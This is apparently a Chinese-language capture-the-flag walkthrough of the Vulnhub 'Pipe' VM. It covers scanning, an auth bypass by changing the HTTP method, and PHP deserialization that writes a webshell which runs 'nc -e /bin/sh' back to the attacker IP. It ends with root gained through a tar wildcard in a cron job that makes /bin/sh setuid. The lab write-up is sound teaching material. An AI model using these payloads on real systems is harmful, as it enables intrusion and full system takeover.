tick.Tack

/dev/random: Pipe

/dev/random: Pipe from Vulnhub


root@kali:~/Security/pipe# nmap 192.168.0.118 -p- -T5 -n

Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2015-12-21 04:55 CST
Warning: 192.168.0.118 giving up on port because retransmission cap hit (2).
Nmap scan report for 192.168.0.118
Host is up (0.00019s latency).
Not shown: 65531 closed ports
PORT      STATE SERVICE
22/tcp    open  ssh
80/tcp    open  http
111/tcp   open  rpcbind
35856/tcp open  unknown
MAC Address: 08:00:27:D7:0B:8C (Cadmus Computer Systems)

Nmap done: 1 IP address (1 host up) scanned in 513.72 seconds

nmap掃出了四個開啟的port,先來看一下port 80

……第一次遇到首頁就要輸入帳號密碼的

35856不知道做甚麼用的,再深入掃瞄試試

root@kali:~/Security/pipe# nmap 192.168.0.118 -p 22,80,111,35856 -A -O
...
PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 6.7p1 Debian 5 (protocol 2.0)
| ssh-hostkey:
|   1024 16:48:50:89:e7:c9:1f:90:ff:15:d8:3e:ce:ea:53:8f (DSA)
|   2048 ca:f9:85:be:d7:36:47:51:4f:e6:27:84:72:eb:e8:18 (RSA)
|_  256 d8:47:a0:87:84:b2:eb:f5:be:fc:1c:f1:c9:7f:e3:52 (ECDSA)
80/tcp    open  http    Apache httpd
| http-auth:
| HTTP/1.1 401 Unauthorized
|_  Basic realm=index.php
|_http-methods: No Allow or Public header in OPTIONS response (status code 401)
|_http-server-header: Apache
|_http-title: 401 Unauthorized
111/tcp   open  rpcbind 2-4 (RPC #100000)
| rpcinfo:
|   program version   port/proto  service
|   100000  2,3,4        111/tcp  rpcbind
|   100000  2,3,4        111/udp  rpcbind
|   100024  1          35856/tcp  status
|_  100024  1          44438/udp  status
35856/tcp open  status  1 (RPC #100024)

結果是rpc對應的port。

在不知道能做甚麼的情況下,只好回到網頁的部分亂試一通

最後試到只要在request method的部分不要用GET就能繞過認證了

接著檢視一下程式碼

<script src="scriptz/php.js"></script>
<script>
function submit_form() {
var object = serialize({id: 1, firstname: 'Rene', surname: 'Margitte', artwork: 'The Treachery of Images'});
object = object.substr(object.indexOf("{"),object.length);
object = "O:4:\"Info\":4:" + object;
document.forms[0].param.value = object;
document.getElementById('info_form').submit();
}
...
<form action="index.php" id="info_form" method="POST">
   <input type="hidden" name="param" value="" />
   <a href="#" onclick="submit_form(); return false;">Show Artist Info.</a>
</form></center></html>

scriptz目錄是開放的,從裡面獲得另一個檔案”log.php.BAK”

這個class會在destruct的時候將data的內容寫入filename

<?php
class Log
{
    public $filename = '';
    public $data = '';

    public function __construct()
    {
        $this->filename = '';
        $this->data = '';
    }

    public function PrintLog()
    {
        $pre = "[LOG]";
        $now = date('Y-m-d H:i:s');

        $str = '$pre - $now - $this->data';
        eval("\$str = \"$str\";");
        echo $str;
    }

    public function __destruct()
    {
        file_put_contents($this->filename, $this->data, FILE_APPEND);
    }
}
?>

按下頁面下方的Show Artist Info之後,瀏覽器會POST一些經過serialize處理後的資訊到index.php

param=O:4:"Info":4:{s:2:"id";i:1;s:9:"firstname";s:4:"Rene";s:7:"surname";s:8:"Margitte";s:7:"artwork";s:23:"The+Treachery+of+Images";}

serialize的做法在php.js

//   example 1: serialize(['Kevin', 'van', 'Zonneveld']);
//   returns 1: 'a:3:{i:0;s:5:"Kevin";i:1;s:3:"van";i:2;s:9:"Zonneveld";}'
//   example 2: serialize({firstName: 'Kevin', midName: 'van', surName: 'Zonneveld'});
//   returns 2: 'a:3:{s:9:"firstName";s:5:"Kevin";s:7:"midName";s:3:"van";s:7:"surName";s:9:"Zonneveld";}'

接著將submit_form()的內容改成要送出的資訊

選擇送到scriptz是因為可以直接進到scriptz的目錄確認有沒有寫入成功

而data的內容看起來也是成功寫入yo.php了

再來就試試看能不能送個reverse shell回來

直接修改html的內容

<script>
function submit_form() {
  var object = serialize({filename: '/var/www/html/scriptz/shell.php', data: '<?php passthru("nc -e /bin/sh 192.168.0.115 22234"); ?>'});
object = object.substr(object.indexOf("{"),object.length);
  object = "O:3:\"Log\":2:" + object;
document.forms[0].param.value = object;
document.getElementById('info_form').submit();
}
</script>

連上 http://192.168.0.117/scriptz/shell.php 之後瀏覽器就卡住了

root@kali:~/Security/pipe# nc -lp 22234
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
uname -a
Linux pipe 3.16.0-4-amd64 #1 SMP Debian 3.16.7-ckt11-1 (2015-05-24) x86_64 GNU/Linux

shell GET!

簡單地蒐集資訊之後,找到一個使用者 rene ,而且他的家目錄沒有擋權限

ls -al
total 208
drwxrwxrwx 2 rene rene   4096 Dec 23 05:04 .
drwxr-xr-x 3 rene rene   4096 Jul  6 07:42 ..
-rw-r--r-- 1 rene rene 124078 Dec 23 05:00 backup.tar.gz
-rw-r--r-- 1 rene rene  26558 Dec 23 05:02 sys-12512.BAK
-rw-r--r-- 1 rene rene  11402 Dec 23 05:01 sys-23924.BAK
-rw-r--r-- 1 rene rene   7231 Dec 23 05:04 sys-2448.BAK
-rw-r--r-- 1 rene rene  27182 Dec 23 05:03 sys-5018.BAK

backup目錄看起來每隔一分鐘就會生出一個檔案,每五分鐘就會打包一包backup.tar.gz

推測是有在跑cron,剛好/etc/crontab也可以讀取,就來看看cron的設定

# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
* * * * * root /root/create_backup.sh
*/5 * * * * root /usr/bin/compress.sh

只能看到/usr/bin/compress.sh的內容

cat compress.sh
#!/bin/sh

rm -f /home/rene/backup/backup.tar.gz
cd /home/rene/backup
tar cfz /home/rene/backup/backup.tar.gz *
chown rene:rene /home/rene/backup/backup.tar.gz
rm -f /home/rene/backup/*.BAK

這邊PATH的設定方式沒辦法達到替換指令的效果

看來只能靠tar來做command injection

於是直接給/bin/sh加上了stickybit

echo "chmod u+s /bin/sh" > shell.sh

等時間一到就可以拿到root的權限了

# sh
sh
# id
id
uid=33(www-data) gid=33(www-data) euid=0(root) groups=33(www-data)
# cat /root/flag.txt
cat /root/flag.txt
                                                                   .aMMMMMMMMn.  ,aMMMMn.
                                                                 .aMccccccccc*YMMn.    `Mb
                                                                aMccccccccccccccc*Mn    MP
                                                               .AMMMMn.   MM `*YMMY*ccaM*
                                                              dM*  *YMMb  YP        `cMY
                                                              YM.  .dMMP   aMn.     .cMP
                                                               *YMMn.     aMMMMMMMMMMMY'
                                                                .'YMMb.           ccMP
                                                             .dMcccccc*Mc....cMb.cMP'
                                                           .dMMMMb;cccc*Mbcccc,IMMMMMMMn.
                                                          dY*'  '*M;ccccMM..dMMM..MP*cc*Mb
                                                          YM.    ,MbccMMMMMMMMMMMM*cccc;MP
                                                           *Mbn;adMMMMMMMMMMMMMMMIcccc;M*
                                                          dPcccccIMMMMMMMMMMMMMMMMa;c;MP
                                                          Yb;cc;dMMMMMMMMMMMP*'  *YMMP*
                                                           *YMMMPYMMMMMMP*'          curchack
                                                       +####################################+
                                                       |======                            | |
                                                       |======                            | |
                                                       |======                            | |
                                                       |======                            | |
                                                       |======                            | |
                                                       +----------------------------------+-+
                                                        ####################################
                                                             |======                  |
                                                             |======                  |
                                                             |=====                   |
                                                             |====                    |
                                                             |                        |
                                                             +                        +

 .d8888b.                 d8b          d8b               888                                                                    d8b
d88P  Y88b                Y8P          88P               888                                                                    Y8P
888    888                             8P                888
888        .d88b.  .d8888b888   88888b."  .d88b. .d8888b 888888   88888b.  8888b. .d8888b    888  88888888b.  .d88b.    88888b. 88888888b.  .d88b.
888       d8P  Y8bd88P"   888   888 "88b d8P  Y8b88K     888      888 "88b    "88b88K        888  888888 "88bd8P  Y8b   888 "88b888888 "88bd8P  Y8b
888    88888888888888     888   888  888 88888888"Y8888b.888      888  888.d888888"Y8888b.   888  888888  88888888888   888  888888888  88888888888
Y88b  d88PY8b.    Y88b.   888   888  888 Y8b.         X88Y88b.    888 d88P888  888     X88   Y88b 888888  888Y8b.       888 d88P888888 d88PY8b.   d8b
 "Y8888P"  "Y8888  "Y8888P888   888  888  "Y8888  88888P' "Y888   88888P" "Y888888 88888P'    "Y88888888  888 "Y8888    88888P" 88888888P"  "Y8888Y8P
                                                                  888                                                   888        888
                                                                  888                                                   888        888
                                                                  888                                                   888        888
Well Done!
Here's your flag: 0089cd4f9ae79402cdd4e7b8931892b7